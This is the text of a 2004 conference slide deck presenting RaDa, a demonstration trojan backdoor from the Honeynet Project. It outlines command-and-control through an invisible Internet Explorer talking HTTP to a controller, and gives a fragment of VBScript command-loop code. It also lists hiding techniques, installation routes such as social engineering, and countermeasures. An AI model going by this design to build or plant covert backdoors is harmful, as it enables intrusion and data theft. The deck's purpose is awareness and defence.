The document describes RaDa, a new trojan backdoor that allows remote control of an infected system. RaDa uses Internet Explorer to communicate over HTTP with a controller site that issues commands. It can execute commands, download and upload files, and take screenshots without appearing in the task manager. The presentation demonstrates its capabilities and discusses improving authentication, using additional communication channels, and techniques for getting RaDa installed on target systems. Countermeasures like firewalls and behavioral analysis are recommended to detect trojans like RaDa.
2. Agenda
• Introduction
• Healthy Environment
• Remote Control (RaDa Demo)
• One step beyond
• Getting it in
• Countermeasures
RaDa: a “new” trojan backdoor 2
3. Intro
• Awareness on trojans for remote control
& protection measures.
• Most concepts are based in Setiri
(R.Temmingh & H.Meer. BH 2002)
• Implemented by Raul Siles, David Perez
& Jorge Ortiz
• Honeynet Project SOTM in September
(Thanks Lance and Ed!)
RaDa: a “new” trojan backdoor 3
4. A healthy environment
• You have done a pretty good job:
– Policy & procedures
– Firewall (ingress and egress filters)
– IDS
– Secure configurations
– AV and Personal Firewalls
• But problems appear…
RaDa: a “new” trojan backdoor 4
5. A healthy environment
Internet
Router
Proxy
Firewall
IDS
Secure system
RaDa: a “new” trojan backdoor 5
6. Remote Control
• Let’s think for a minute that the
intruder has been able to install a
program.
• We shall cover this later.
RaDa: a “new” trojan backdoor 6
7. Remote Control: implementation
• RaDa:
– Very easy to do
– A lot of Cut&Paste code (Google
knows how to do it!)
– Visual Basic, Perl…
– Using the IE of the system
– HTTP communications
RaDa: a “new” trojan backdoor 7
8. RaDa: implementation
Sub RaDa_Run()
' Load commands file ' Loop through the commands
Set oExplorer = ' (Input fields in the first Form)
CreateObject("InternetExplore For Each Element In
r.Application") oExplorer.Document.Forms(0).Elements
oExplorer.Visible = 0
sCommandsURL = sServerURL & Select Case Element.Name
"/" & sCommandsFile
Case "exe"
oExplorer.Navigate
sCommandsURL vRetValue = CommandExe(Element.Value)
Case "get“
vRetValue = CommandGet(Element.Value)
Case "put“
' Close Internet Explorer and vRetValue = CommandPut(Element.Value)
release the object variable Case Else
"oExplorer" 'Ignore unknown command
oExplorer.application.Quit End Select
Set oExplorer = Nothing Next Element
End Sub
RaDa: a “new” trojan backdoor 8
9. RaDa: How It Works
1. Intruder publishes order
2. RaDa opens invisible IE
Intruder Controller
3. IE sends GET to Ctrler
4. Ctrler sends command
back to RaDa
HTTP/HTTPS 5. RaDa execs command &
sends response with
POST
6. Intruder retrieves results
from Ctrler
RaDa: a “new” trojan backdoor 9
10. Demo
RaDa: Command Exec
1. RaDa/IE retrieves
command from
Intruder Controller
Ctrler with GET
2. Parse page <input
type=“text”
name=“exe”
value=“…”>
3. Exec command
with Cmd.exe
RaDa: a “new” trojan backdoor 10
11. Demo
RaDa: File Download
1. RaDa/IE retrieves
command from
Intruder Controller Ctrler with GET
2. Parse page <input
type=“text”
name=“get”
value=“…”>
3. Download file from
Ctrler with POST.
4. UUdecode and
save it
RaDa: a “new” trojan backdoor 11
12. Demo
RaDa: Screen Capture
1. RaDa/IE retrieves
command from
Intruder Controller
Ctrler with GET
2. Parse page <input
type=“text”
name=“screenshot”
value=“…”>
3. Capture screen with
selected name
RaDa: a “new” trojan backdoor 12
13. Demo
RaDa: File Upload
1. RaDa/IE retrieves
command from
Intruder Controller Ctrler with GET
2. Parse page <input
type=“text”
name=“put”
value=“…”>
3. Send back
contents with
POST
RaDa: a “new” trojan backdoor 13
14. Demo
RaDa: hiding techniques
• No application in Task Manager
• Process name
• Packed
• HTTP through IE using HTML
• Misleading info
• VMWare detection
RaDa: a “new” trojan backdoor 14
15. One Step Beyond
• Strong authentication of commands
(GPG)
• Blog/Wiki
• Multiagent management Console
• Other channels (mail, dns, ping,
ftp)
RaDa: a “new” trojan backdoor 15
16. Getting it in
• Zero day exploit
• Ask for help:
– Mail attachment
– Download
– Social engineering
• Insider
RaDa: a “new” trojan backdoor 16
17. Countermeasures
• User awareness
• Baselines (processes, memory…)
• Restrict web access
• Update AV signatures frequently.
• Signed Executables
• Behavioral vs. Signature analysis
RaDa: a “new” trojan backdoor 17
18. Scan of the Month
• Goal:
– Improve the Windows reverse
engineering malware state of the art
• Honeynet Project:
– http://www.honeynet.org/scans/
RaDa: a “new” trojan backdoor 18
19. That’s all folks
• Thank you!
• Any questions?
FIST Conference Octubre/Madrid 2004
RaDa: a “new” trojan backdoor 19
20. Attribution-NonCommercial-
NoDerivs 2.0
You are free:
to copy, distribute, display, and perform the work
Under the following conditions:
Attribution. You must give the original author credit.
Noncommercial. You may not use this work for commercial purposes.
No Derivative Works. You may not alter, transform, or build upon this work.
For any reuse or distribution, you must make clear to others the license terms of this work.
Any of these conditions can be waived if you get permission from the author.
Your fair use and other rights are in no way affected by the above.
This is a human-readable summary of the http://creativecommons.org/licenses/by-nc-
nd/2.0/.
RaDa: a “new” trojan backdoor 20